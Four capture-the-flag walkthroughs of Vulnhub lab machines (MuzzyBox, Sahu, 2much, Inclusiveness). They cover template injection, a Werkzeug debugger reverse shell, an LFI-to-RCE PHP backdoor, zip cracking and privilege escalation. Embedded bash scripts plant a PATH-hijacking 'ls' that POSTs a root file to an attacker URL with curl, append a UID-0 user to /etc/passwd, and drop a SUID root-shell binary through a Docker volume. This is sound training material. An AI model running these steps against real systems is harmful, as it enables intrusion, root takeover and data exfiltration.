MuzzyBox: 1: Vulnhub Walkthrough

Introduction

Today we are going to crack this machine called MuzzyBox. It was created by Muzzy. Duh! This is a Capture the Flag type of challenge, but the approach is a bit different from the standard boot-to-root routine: it consists of three challenges, each with a flag of its own. Let’s get cracking!!

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover
    • Nmap
  • Initial Enumeration
    • Browsing HTTP Service at port 80
  • Challenge #1
    • Browsing the HTTP Service at port 3000
    • Downloading the idcard.png template
    • Editing the idcard.png
    • Reading Flag #1
  • Challenge #2
    • Browsing the HTTP Service at port 8989
    • Getting a Python Shell
    • Reading Flag #2
  • Challenge #3
    • Detecting the Server-Side Template Injection
    • Getting shell using tplmap
    • Enumerating the shell
    • Getting SSH session
    • Hijacking the ls command through PATH
    • Reading Flag #3

Walkthrough

Network Scanning

To attack any machine, we first need to find its IP address. We did this with netdiscover and matched the result against the MAC address shown in the virtual machine’s network settings, which is the reliable way to pick the target out of a busy lab network. The IP address of the machine turned out to be 192.168.1.6.

Now that we have the IP address, we need to enumerate the open ports on the machine. For this we ran an nmap aggressive scan (-A), which bundles version detection, default scripts and OS detection into one run.

The aggressive scan quickly gave us some useful information: ports 22 (SSH), 80 (HTTP), 3000 (HTTP) and 15000 (HTTP) are open. One caveat worth remembering: -A does not widen the port range, so this scan only covers nmap’s default top 1,000 ports. The services on 8989 and 9633 that we use later were learned from the index page, not from this scan; a full-range scan (-p-) would have shown them up front. So nice of the author to give us so many HTTP services to explore. Let’s move on to the enumeration stage.

Initial Enumeration

Let’s start with the traditional HTTP port, port 80. We opened the IP address of the machine in the browser and got a directory index containing a single text file named index.txt. That was odd, but okay. We clicked on the file.

Here we get this nicely crafted introduction of the Lab Environment. This machine has been divided into 3 Challenges. Each containing a flag.

Challenge #1

Let’s start with Challenge #1. The description states that Washington University created an online library, but currently only the principal is authorised. The library is hosted on the HTTP service running on port 3000, and an ID card image is hosted on port 9633. Let’s start by enumerating port 3000.

Okay, that’s quite a dull library, but in the end it is a library. If you go through the introduction text, you learn that the developers have implemented a security measure to prevent unauthorised access: they have used an alternative to an SQL database to store the records. How nice of them to give us that hint. The process to enter the library is to upload the ID card on this page, after which access is granted. In other words, whatever is written on the uploaded card ends up in the database lookup, which makes the card text our injection point.

The template is provided to us on port 9633. Let’s take a look at it. We know that the principal has access to the library, but we don’t know the principal’s name, so we need a way around that.

For starters, we downloaded the idcard.png file to our attacker machine using the wget command.

The introduction on port 3000 told us that authentication is checked against an alternative to an SQL database. If they are not using SQL, the obvious alternative is NoSQL, and NoSQL lookups that build the query straight from user input are open to injection. We searched for NoSQL injection payloads that make the lookup match any name rather than a specific one, found quite a few, and decided to use the one shown below.

We then edited the downloaded idcard.png so that it looked like the screenshot below, with the NoSQL payload in place of the principal’s name. Any image editor, including the online ones, will do. We made the following changes.

Now that the ID card is ready, let’s upload it. The upload was a success and we have cracked Challenge #1. This flag is in the form of a PIN; take note of it, we will need it down the road.

Challenge #2

We move on to the next challenge. After we broke the authentication in the previous challenge, the university developed a new website. How unnecessary! It is under maintenance, and we are asked to list the current directory and read the flag file. It shouldn’t be difficult. The new website is hosted on port 8989. Upon browsing it we see an error page with a traceback. While we were casually looking at the errors, we saw a console icon; hovering over it gave the message “Open an interactive python shell in this frame”. That tooltip is the Werkzeug debugger, which Flask serves when debug mode is left on: every frame of the traceback can be turned into a live Python console. How convenient!

We clicked on the console icon and were greeted with a pop-up asking for a PIN. If we remember correctly, the flag from the previous challenge was in the form of a PIN. Let’s try it.

PIN: 123-456-789

Since this is an interactive Python shell, we need a Python reverse shell rather than a binary payload. We took the Python reverse shell from the pentestmonkey reverse shell cheat sheet and split it so that it could be executed line by line in the console, as shown in the image. We chose port 5555 for the reverse shell and opened a netcat listener on it. As soon as we executed the last line, we had a shell.

The objective of this challenge was to list the current directory, so we ran the ls command. We found a directory named flag. Inside this directory, we found a script called ctf2.py. We read the contents of this script to get ourselves the second flag.

Again we seem to have a hint in this flag. It tells us to read a file at the home directory of the user webssti.

Challenge #3

Two challenges down, one to go! We went back to the index for the description of the third challenge. It says that when we compromised the machine in the last challenge, the root user started auditing it. Well, he or she really should do a better job; it wasn’t that difficult. We are told that the root user is using sudo and bash with the ls command, which is interesting. Finally, we are told to read the last flag using an “out-of-band technique”. This challenge is hosted on port 15000. We modified the URL parameter so that the page printed the name Raj. #PersonalTouch. Our input is reflected through the page template, so what kind of vulnerability is this? It’s elementary, my dear Watson: Server-Side Template Injection. The quick confirmation is to send a template expression such as {{7*7}} through the same parameter; if the page prints 49 rather than the braces, the input is being evaluated by the template engine.

For exploiting this vulnerability we have just the tool: tplmap, available on GitHub. We cloned it to our attacker machine and changed into the directory to find tplmap.py. We ran it with the injection point passed in the URL (-u) and the --os-shell option to get a shell.
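Before handing the URL to tplmap it is worth confirming the injection by hand. The script below is an added example written for this article, not the author’s commands or tplmap’s output. It assumes the injectable query parameter is called name (the article only says the URL was modified) and that the service is at 192.168.1.6:15000. The two probes are the standard ones: {{7*7}} shows whether the expression is evaluated at all, and {{7*'7'}} separates Python engines such as Jinja2 (string repetition gives 7777777) from PHP engines such as Twig (49).

```bash
#!/usr/bin/env bash
# Added example for the SSTI check; not part of the original walkthrough.
# Assumptions: the reflected parameter is "name" and the target is host:port below.
TARGET="${TARGET:-192.168.1.6:15000}"
PARAM="${PARAM:-name}"

# Classify a response body for the probe that was sent.
#   {{7*7}}   -> "evaluated" when 49 comes back, "none" if the braces are echoed
#   {{7*'7'}} -> "jinja2-like" (7777777), "twig-like" (49) or "none"
classify_ssti() {
  probe="$1"; body="$2"
  case "$probe" in
    '{{7*7}}')
      case "$body" in
        *'{{7*7}}'*) echo none ;;        # reflected verbatim: no template evaluation
        *49*)        echo evaluated ;;
        *)           echo none ;;
      esac ;;
    "{{7*'7'}}")
      case "$body" in
        *7777777*) echo jinja2-like ;;   # Python: int * str repeats the string
        *49*)      echo twig-like ;;     # PHP: '7' is coerced to 7
        *)         echo none ;;
      esac ;;
    *) echo unknown-probe ;;
  esac
}

# Percent-encode the probe so braces, quotes and * survive the query string.
encode_probe() {
  printf '%s' "$1" | sed -e 's/{/%7B/g' -e 's/}/%7D/g' -e "s/'/%27/g" -e 's/\*/%2A/g'
}

# Live probe (needs the target): send it and classify the answer.
probe_ssti() {
  body=$(curl -s "http://$TARGET/?$PARAM=$(encode_probe "$1")")
  classify_ssti "$1" "$body"
}

# Run both probes only when RUN_DEMO=1, so the file can also be sourced.
if [ "${RUN_DEMO:-0}" = 1 ]; then
  for p in '{{7*7}}' "{{7*'7'}}"; do
    printf '%-10s -> %s\n' "$p" "$(probe_ssti "$p")"
  done
fi
```

If 49 could already occur somewhere in the page, swap in a product that cannot (for example 1337*1337) before trusting the result. Once a probe comes back as evaluated, tplmap’s job is only to pick the right engine payload; the manual check tells you which engine to expect before the noise starts.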

We got a shell in no time and ran the id command to see who we are. Back to the previous challenge: its flag asked us to read a file in the home directory of the webssti user, and we are indeed logged in as webssti. We checked the working directory with pwd and listed it with ls. There was a directory named ssti; inside it we found the no_flag.txt file we were looking for and read it with cat. It contains the SSH username and password. Brilliant!!

Time to get that SSH shell. We logged in with the credentials we just found. The final flag is in /root, so we tried to read it, but we were unsuccessful.

Time to escalate privileges on this shell. We ran sudo -l, but it listed nothing for our user. We remembered from the introduction that root runs ls through sudo and bash, which suggests a PATH hijack. We printed the PATH with echo $PATH and checked which ls is actually run with which ls. The directory /usr/local/sbin comes before /bin in the PATH and turned out to be writable by our user, so a file named ls placed there will be executed instead of the real one. Note that sudo on its own would normally reset PATH through its secure_path setting; the challenge text tells us root also runs ls through bash, which is the part that makes a PATH hijack viable here. We created the file with nano as shown in the image below.

Inside that file we used the curl command to send a POST request to our attacker machine with the contents of the final flag. Since root’s output never reaches us, that is the out-of-band channel the challenge asked for. Clever, isn’t it?

Before saving the file and leaving nano, we started a netcat listener on port 1234. In no time the final flag arrived in the listener.
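The PATH check and the out-of-band wrapper from this challenge, written out as an added shell example; these are not the walkthrough’s own commands. The listener URL, the flag path /root/final_flag.txt and the directory passed to plant_wrapper are placeholders (the article only tells us /usr/local/sbin was writable and that the listener was on port 1234), so all three are parameters.

```bash
#!/usr/bin/env bash
# Added example: PATH-hijack enumeration plus an out-of-band exfil wrapper.
# Not from the original walkthrough. ATTACKER_URL, FLAG_FILE and TARGET_DIR below
# are illustrative placeholders.

# Print the directories in $PATH that (a) precede the directory holding the real
# binary and (b) are writable by us. Any hit lets us shadow that binary.
writable_dirs_shadowing() {
  bin="$1"
  hash -r 2>/dev/null || true              # ignore bash's cached lookups
  real=$(command -v "$bin") || return 1
  realdir=$(dirname "$real")
  printf '%s\n' "$PATH" | tr ':' '\n' | while IFS= read -r d; do
    [ "$d" = "$realdir" ] && break         # once we reach the real one, stop
    [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
  done
}

# Drop a fake "ls" into DIR. Root's stdout never reaches us, so the wrapper POSTs
# FLAG_FILE to ATTACKER_URL and then execs the real ls with the original
# arguments, so whoever ran it still sees a normal listing.
plant_wrapper() {
  dir="$1"; flag_file="$2"; attacker_url="$3"
  real=$(command -v ls)
  cat > "$dir/ls" <<EOF
#!/bin/sh
if [ -r "$flag_file" ]; then
  curl -s --connect-timeout 2 -X POST --data-binary @"$flag_file" "$attacker_url" >/dev/null 2>&1
fi
exec "$real" "\$@"
EOF
  chmod 755 "$dir/ls"
}

# Listener side is simply: nc -lvnp 1234. Run the target side with RUN_DEMO=1.
if [ "${RUN_DEMO:-0}" = 1 ]; then
  echo "writable dirs ahead of ls:"; writable_dirs_shadowing ls
  plant_wrapper "${TARGET_DIR:-/usr/local/sbin}" "${FLAG_FILE:-/root/final_flag.txt}" \
                "${ATTACKER_URL:-http://192.168.1.2:1234/}"
fi
```

The same enumeration is worth running on any box: a writable directory that precedes /bin or /usr/bin in root’s PATH is a finding in its own right, whether or not a cron job or sudo rule is known to exercise it yet.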

This was a good set of challenges and I enjoyed solving it. The first and second challenges were nice and something you could come across in real life. The format of small challenges instead of a standard CTF was a fresh approach. I appreciate the author and look forward to more in this series.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. I am writing this article while working from home. Take Care and be Healthy!

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

Sahu: Vulnhub Walkthrough

Today we are going to complete a boot2root challenge of the lab Sahu. The lab is developed by Vivek Gautam and can be downloaded from here. The lab is fairly easy for beginners and helps you get familiar with the concept of CTF challenges. It also helps to develop your enumeration skills, as it focuses almost entirely on enumeration.

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover scan
    • Nmap scan
  • Enumeration
    • Browsing HTTP service at port 80
    • Directory Bruteforce using dirb
    • Enumerating Source Code
    • Directory Generation using Crunch
    • Bruteforce Zip Password using fcrackzip
  • Exploitation
    • Connecting to Target using SMB
    • Enumerating SMB
  • Post Exploitation
    • Running LinEnum script
  • Privilege Escalation
    • Writable /etc/passwd file
    • Generating Password Hash using Openssl
    • Appending hash to /etc/passwd
    • Getting Root Privileges
  • Reading Root Flag

The first stage in starting the challenge is knowing your target, so we began with a netdiscover scan to find the target’s IP address on the local network.

After that we started active reconnaissance by scanning the target IP with nmap.

As seen in the image above, nmap shows the open ports 21, 22, 80, 139 and 445 with the services FTP, SSH, HTTP, NetBIOS-SSN and Samba (SMB). The script output also showed that anonymous login is enabled on FTP, so we logged in to FTP as anonymous.

When prompted, enter the password anonymous. Once logged in, use the ls command to list the contents. A single file was found here, namely ftp.zip.

When we tried to open it, it asked for a password, and since we did not know it we moved on. Opening the IP address in the browser gave the web page shown below.

Next we enumerated directories with dirb.

As a result we found the directory /H/A/R/. If you remember, the image on the web page was of Haryana, so we can reasonably guess that the full path is /H/A/R/Y/A/N/A/, and when opened in the browser it shows the following.

In the source code there is a phrase saying “try to extract with hurry”. Now this is something useful.

We had found an image on the web page and we have a hint in the source code, which is a strong pointer to steganography. So we used steghide to extract whatever is embedded in the image (steghide hides and extracts data inside image files; it is not a metadata tool), supplying the hint as the passphrase.

When asked for the passphrase, enter the word hurry. As you can see in the image below, this extracts a file which reads: “I have found the password for a zip file but I have forgot the last part of it, can you find out. 5AHU**”

According to the hint, the first four characters of the password are 5AHU, the password is six characters long, and we must find the last two characters. We can do this with crunch and build a dictionary to brute-force the password. The last two characters could be any combination, alphanumeric or special characters, so we used crunch to generate a dictionary of every possible two-character ending.

Once the wordlist for the dictionary attack was created, we ran the attack with fcrackzip.
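The dictionary step, reproduced as an added shell example that does not depend on crunch (the article’s crunch and fcrackzip commands were in screenshots and are not reproduced here). The charset, all printable ASCII from ! to ~, is my assumption of what “any combination” should cover; the zip name ftp.zip and the prefix 5AHU are from the article.

```bash
#!/usr/bin/env bash
# Added example: build the 5AHU?? wordlist without crunch, then crack with fcrackzip.
# Assumption: the two unknown characters come from printable ASCII 33-126 (94 chars).

# Every printable ASCII character except space, one per line (94 lines).
printable_charset() {
  awk 'BEGIN { for (i = 33; i <= 126; i++) printf "%c\n", i }'
}

# Write PREFIX followed by every two-character suffix to OUT; print the line count.
# 94 * 94 = 8836 candidates, small enough that a dictionary attack is instant.
gen_suffix_wordlist() {
  prefix="$1"; out="$2"
  chars=$(printable_charset)
  : > "$out"
  printf '%s\n' "$chars" | while IFS= read -r a; do
    printf '%s\n' "$chars" | while IFS= read -r b; do
      printf '%s%s%s\n' "$prefix" "$a" "$b"
    done
  done >> "$out"
  wc -l < "$out" | tr -d ' '
}

# Dictionary attack on the zip: -D dictionary mode, -p wordlist, -u actually try
# to unzip so the false positives from PKZIP's weak 1-byte check are discarded.
crack_zip() { fcrackzip -u -D -p "$1" "$2"; }

if [ "${RUN_DEMO:-0}" = 1 ]; then
  n=$(gen_suffix_wordlist 5AHU sahu.txt)
  echo "generated $n candidates"
  crack_zip sahu.txt ftp.zip
fi
```

Without -u, fcrackzip reports every candidate that passes the archive’s one-byte header check, which for 8,836 guesses means a handful of wrong “hits”; with -u only a password that really extracts is printed.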

The password was cracked using the above method and we retrieved an ftp.txt file containing a username and password. From the nmap scan it was clear that the SMB port (139) was open, so we ran enum4linux to enumerate the SMB service.

It is clear that a connection to the sambashare can be made with smbclient, so we connected to it, providing the password retrieved from ftp.txt when asked.

Connecting through smbclient let us look around the share, which led us to ssh.txt. Reading ssh.txt revealed a username and password. Given the filename, it can safely be assumed that these are SSH credentials, so let’s try to log in through SSH.

Provide the password when asked and the SSH login will succeed. After logging in to the machine, we used wget to transfer the LinEnum script to the target. After the transfer, we gave the script execute permission and ran it.

As a result we found that the /etc/passwd file is writable, which allows us to add a new user with whatever UID we like.

To make a new user we first generated a password hash on the attacker machine with openssl passwd.

Now that we have the hash, all we need to do is append a passwd entry for the new user to the target machine.

On the target we used the echo command to append the line to /etc/passwd, and verified that the user had been added by looking at the end of the file with tail. This works because the system accepts a real password hash in the second field of /etc/passwd; only an “x” there sends the lookup to /etc/shadow. Now that the user is added, let’s switch to it using the su command. Since the user we created has UID 0, we own root on this machine.
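The /etc/passwd route written out as an added shell example, not the article’s screenshots. The new user name hacker, the password Password123 and the fixed salt are illustrative (the salt is pinned only so the hash is reproducible). The functions take the file path as a parameter so the logic can be tried on a copy before touching the real file, and the last function is the check a defender would run to spot this backdoor.

```bash
#!/usr/bin/env bash
# Added example: add a UID-0 user through a writable /etc/passwd, and detect it.
# Not the walkthrough's own commands. "hacker"/"Password123" are placeholders.

# The one-line version of what LinEnum flagged.
passwd_is_writable() { [ -w "${1:-/etc/passwd}" ]; }

# crypt(3)-format hash. -6 is SHA-512; -1 (MD5) is what older walkthroughs use
# and still works. Run this on the attacker box; the salt is fixed for reproducibility.
make_hash() { openssl passwd -6 -salt "$2" "$1"; }

# passwd line: name:hash:uid:gid:gecos:home:shell. A real hash in field 2 is
# honoured directly by pam_unix/getpwnam, so no /etc/shadow entry is needed.
make_passwd_line() {
  user="$1"; hash="$2"; uid="${3:-0}"; gid="${4:-0}"
  printf '%s:%s:%s:%s:%s:/root:/bin/bash\n' "$user" "$hash" "$uid" "$gid" "$user"
}

# Append the line and echo the file's last line back so you can eyeball it.
add_user() {
  line="$1"; file="${2:-/etc/passwd}"
  passwd_is_writable "$file" || { echo "$file is not writable" >&2; return 1; }
  printf '%s\n' "$line" >> "$file"
  tail -n 1 "$file"
}

# Defender's check: any UID-0 entry whose password field is not the shadow
# marker "x" (or a locked "*"/empty) is a planted account or a tampered root line.
is_uid0_with_hash() {
  awk -F: '$3 == 0 && $2 != "x" && $2 != "*" && $2 != "" { f = 1 } END { exit !f }' "$1"
}

if [ "${RUN_DEMO:-0}" = 1 ]; then
  h=$(make_hash 'Password123' 'saltsalt')
  add_user "$(make_passwd_line hacker "$h" 0 0)"
  echo "now: su hacker"
fi
```

After su hacker, id should report uid=0(root). The same awk check, run from cron or a file-integrity tool, catches this technique regardless of the user name chosen.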

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

2much: 1: Vulnhub Walkthrough

In this article, we are going to crack the 2much: 1 Capture the Flag Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to 4ndr34z. Download this lab by clicking here.

Level: Intermediate

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover scan
    • Nmap scan
  • Enumeration
    • Enumerating HTTP service on Browser
    • Node.js injection detection
  • Exploitation
    • Installing NodeXP
    • Getting meterpreter using NodeXP
  • Post Exploitation
    • Enumerating for User Flag
    • Reading the User Flag
  • Privilege Escalation
    • Enumerating Bash History
    • Scripting for SUID
    • Exploiting SUID
    • Getting Root Access
  • Reading Root Flag

Walkthrough

Network Scanning

We downloaded and imported the virtual machine (.ova) into VMware Workstation and ran it; the machine is automatically assigned an IP address by the network’s DHCP. To begin we find the IP address of our target machine with netdiscover, which lists all the hosts on the internal network.

We found the target’s IP address, 192.168.0.109. The next step is to scan the target with nmap to find the open ports and services, which tells us how to proceed.

Enumeration

There were quite a few services running on the system, but seeing port 80 we wanted to look at the web page hosted on it. We found the target machine riddled with deliberately vulnerable applications such as DVWA and XVWA. We tried to get into the system through those but were unsuccessful.

We then went through the HTTP services from the nmap output one by one until we reached a Node.js service on port 8081. Browsing the port returned the message “Hello undefined”. This suggests the page takes a parameter that defines the name and, since we supplied nothing, it came out as undefined.

Exploitation

We could have tampered with this parameter manually, but that takes a lot of time, so we used NodeXP, a tool that does the heavy lifting for us. As it is hosted on GitHub, we used git clone to fetch the repository, then changed into the cloned directory to find the Python script and the other required files.

We read the README, which gives the syntax for providing the target URL, and ran the script as shown in the image.

The tool sends a series of payloads to determine whether the Node.js application is injectable. After running for a while it confirms that the target is injectable and asks whether we want to generate a meterpreter shell. We enter ‘y’, and it then asks for our local IP address and port, which we provide. It then loads the Metasploit Framework.

After our confirmation, the tool opens a prompt and configures the Metasploit Framework to attack the target.

Metasploit loads and the payload is uploaded. As soon as the upload completes, three sessions are created.

We can confirm this with the sessions command in the Metasploit Framework. As shown in the image below, we have three sessions from the target.

Post Exploitation

We interact with the third session using the -i option of the sessions command. The shell we got was not a proper TTY, so we upgraded it with the usual Python pty one-liner. After gaining the TTY shell, we checked the user with id. On further enumeration we found user.txt, which we believe is our first flag!

Privilege Escalation

As part of our post-exploitation, we looked through the .bash_history file and found a set of SSH credentials, as shown in the image below.

We tried to log in via SSH as root with those credentials, and this gave us a root shell. But something tells us the game isn’t over yet. We ran ip addr to look at the network configuration and found the address 172.17.0.4/16. That is Docker’s default bridge network, which tells us that this shell is inside a container, not on the host.

Moving on, we looked around the filesystem and found a file named tdl.txt. It tells us that port 21 is open with anonymous access allowed. We logged out of the SSH session and looked for the same tdl.txt on the host. Proper enumeration showed that the same file exists at /home/4ndr34z/ftp/ on the host, which means this directory is shared with the container as a volume.

This means we can escalate privileges through the container. We log in as root in the container and drop a SUID binary into the shared directory; because the bind mount is the same filesystem and, without user-namespace remapping, the same UIDs, a file owned by root with the SUID bit set inside the container is also root-owned and SUID on the host. Then we log out of the container, go back to the host and execute it. We use the following script for the escalation.

As the script is in C, we compiled it with gcc as shown in the image below. After compiling, we served the binary over HTTP using the Python one-liner web server.

Now we log in as root in the container as before and download the exploit binary with wget, as shown in the image. It needs the SUID bit, so we set it with chmod (chmod 4755, or chmod u+s) on the binary in the shared directory.

Now we log out of the container, go to the location of the file on the host and execute the binary. We see that we have root privileges on the target machine. All that’s left is to read the root flag.
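The container-to-host step as an added example; it is not the article’s exploit source. Assumed: the shared directory is /home/4ndr34z/ftp (the article confirms that path on the host and that the same file is visible from the container; the in-container mount point is taken to be the same path), gcc is available on the attacker machine, and the host uses the Docker default of no user-namespace remapping.

```bash
#!/usr/bin/env bash
# Added example: plant a SUID root binary in a directory shared with the host.
# Not from the original walkthrough. SHARED and the listener/server addresses are
# placeholders.
SHARED="${SHARED:-/home/4ndr34z/ftp}"

# The C payload. setgid/setuid(0) make the real ids 0 as well, so the shell
# will not drop privileges; bash -p guards against that anyway.
write_suid_source() {
  cat > "$1" <<'EOF'
#include <unistd.h>
int main(void) {
    setgid(0);
    setuid(0);
    execl("/bin/bash", "bash", "-p", (char *)0);
    return 1;   /* only reached if execl failed */
}
EOF
}

# Attacker side: compile, then serve it (python3 -m http.server 8000).
# If the container's libc differs from yours, add -static.
build_exploit() { gcc -o "$2" "$1"; }

# Container side, as root: fetch into the shared dir and mark it. Ownership and
# mode bits are stored on the host's filesystem, so they survive the logout.
fetch_and_mark() { wget -q -O "$2" "$1" && chown 0:0 "$2" && chmod 4755 "$2"; }

# Is DIR a mount point (bind mount from the host)? Read /proc/mounts directly.
is_mount_point() { awk -v d="$1" '$2 == d { f = 1 } END { exit !f }' /proc/mounts; }

# Host side: what a defender (or you, double-checking) should run over shared
# volumes. SUID bits set inside a container are visible from the host.
find_suid() { find "$1" -xdev -type f -perm -4000 2>/dev/null; }

if [ "${RUN_DEMO:-0}" = 1 ]; then
  case "${ROLE:-}" in
    attacker)  write_suid_source exp.c && build_exploit exp.c exp ;;
    container) is_mount_point "$SHARED" && echo "$SHARED is a mount point"
               fetch_and_mark "http://${ATTACKER:-192.168.0.2}:8000/exp" "$SHARED/exp" ;;
    host)      find_suid "$SHARED"; "$SHARED/exp" ;;
  esac
fi
```

Two things defeat this on a hardened host: a nosuid mount option on the shared directory (the SUID bit is then ignored at exec time) and userns-remap, which makes container root an unprivileged host UID so the planted file is not root-owned at all.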

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

Inclusiveness: 1: Vulnhub Walkthrough

Another walkthrough, this time for the Vulnhub machine “INCLUSIVENESS: 1”, an intermediate-level lab by “h4sh5 & Richard Lee” designed to give a taste of the OSCP labs. The challenge is the same as any other CTF: find the flag with the help of your pentest skills.

Download it from here: https://www.vulnhub.com/entry/inclusiveness-1,422/

Penetration Testing Methodologies

Network Scanning

  • Netdiscover
  • nmap

Enumeration

  • robots.txt
  • User-agent restriction bypass
  • LFI

Exploiting LFI

  • LFI To RCE

Privilege Escalation

  • Abusing PATH Variable

Walkthrough

Network Scanning

As always we start with netdiscover to get the IP of the VM, and the host IP I found is 192.168.29.151.

Let’s proceed with a network scan using the nmap aggressive scan, as given below.

As a result we find that port 21 is open for FTP with anonymous login allowed and the /pub directory writable, and ports 80 and 22 are also open for HTTP and SSH respectively.

Enumeration

To find any loopholes we need to enumerate further, so we browsed the host IP in the web browser, but unfortunately we found only the “Apache2 Debian Default Page”.

Instead we checked for the robots.txt file, and as a result the message “You are not a search engine! You can’t read my robots.txt!” was shown.

Without wasting time, I bypassed this restriction by setting a new user agent in Firefox using the following steps:

  • In the URL bar open “about:config”
  • Search for the preference name “useragent”
  • Right-click > New > String

You get a dialog box; enter the preference name “general.useragent.override” as shown in the image below.

Enter the string value “GoogleBot” as the user agent.

Once the above steps are complete, the record for your new preference will be shown.

Now reload /robots.txt and you will be able to read the disallowed entry “/secret_information/” as shown below. (From the command line the same check is a curl request with a custom User-Agent header.)

So we explored /secret_information/, which brings up a web page describing “DNS Zone Transfer Attack” with two hyperlinks, “English” and “Spanish”.

Clicking the “English” hyperlink showed that it loads en.php via a lang parameter in the URL, which means there could be a Local File Inclusion (LFI).

So I tried to fetch /etc/passwd by abusing the PHP include in the page, and got the whole contents of /etc/passwd, as shown in the image below.

Exploiting LFI

It was time to turn the LFI into code execution by including a file of our own, and as we know, the FTP service allows anonymous access and /pub is writable.

We then read the FTP configuration file vsftpd.conf through the LFI to learn the on-disk path of the writable directory (the anon_root setting gives the anonymous FTP root, under which /pub lives).

We prepared a PHP file containing a small backdoor that runs operating-system commands.

Now it’s time to upload the malicious file backdoor.php to the host via FTP, using the commands below.

Then we include the uploaded file through the LFI to execute it. Using the URL above, run backdoor.php and, at the same time, pass it the OS command id, as shown in the image.

Having achieved RCE through the LFI, we continued with Metasploit’s web_delivery module to get a reverse connection from the host.

This generates a PHP one-liner that you execute through the web URL in the same way as above. So I copied the generated code and pasted it into the URL, and executing it gave us a connection back from the host.

Privilege Escalation

Booom!!! We hit the goal and obtained a meterpreter session on the host. Since it is a boot-to-root CTF, we need to escalate to a root shell, so we looked for programs with the SUID bit set.

With the help of the find command we got the list of SUID programs, among which I noticed /home/tom/rootshell.

Inside /home/tom/ I found the rootshell.c source file and the compiled rootshell binary with SUID permissions.

According to the code, the program runs the whoami program and, if the output is “tom”, gives a privileged shell; otherwise it just prints the current user ID.

In simple words, rootshell gives a high-privilege shell if the output of whoami is “tom”.

We can take advantage of this by abusing the PATH variable: because rootshell calls whoami by name rather than by absolute path, whichever whoami is found first in PATH gets run. So we created a file named whoami in /tmp containing a one-line shell script that prints “tom”.

Then we put /tmp at the front of the PATH variable for this session, as shown in the following command.

With that done, running rootshell gives the root shell, as shown below.
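A shell stand-in for the rootshell check, added here as an example; it is not rootshell.c from the machine. It shows the vulnerable lookup (whoami resolved through PATH), the hardened lookup with an absolute path, and the better fix of comparing numeric UIDs instead of a helper program’s printed name. TOM_UID and the check_* names are mine.

```bash
#!/usr/bin/env bash
# Added example: why rootshell's `whoami` check can be fooled, and two fixes.
# Not the machine's rootshell.c. check_* and plant_fake_whoami are illustrative.

# Vulnerable: whichever "whoami" appears first in $PATH answers the question.
check_vuln()  { [ "$(whoami)" = "tom" ]; }

# Fix 1: absolute path, so a /tmp/whoami is never consulted. (A SUID program
# that still uses system()/popen should also reset PATH before calling out.)
check_fixed() { [ "$(/usr/bin/whoami)" = "tom" ]; }

# Fix 2: compare ids, not strings printed by a helper. A SUID C program should
# call getuid() here; `id -u` is the shell equivalent.
check_uid()   { [ "$(id -u)" -eq "${TOM_UID:-1000}" ]; }

# Attacker side: a fake whoami that prints "tom", put first in PATH.
plant_fake_whoami() {
  printf '#!/bin/sh\necho tom\n' > "$1/whoami"
  chmod +x "$1/whoami"
  PATH="$1:$PATH"; export PATH
  hash -r 2>/dev/null || true
}

if [ "${RUN_DEMO:-0}" = 1 ]; then
  plant_fake_whoami /tmp
  check_vuln  && echo "vulnerable check fooled: $(whoami)"
  check_fixed || echo "absolute-path check not fooled: $(/usr/bin/whoami)"
  /home/tom/rootshell
fi
```

Note that Fix 1 is still weaker than Fix 2: it trusts the output of an external program, and a SUID binary that calls system() inherits the caller’s environment, so anything else the environment influences (locale, shell options) is still under the attacker’s control.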

Finally, with the root shell we found the flag.txt file. This lab has a good combination of a basic web vulnerability and OS privilege escalation.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn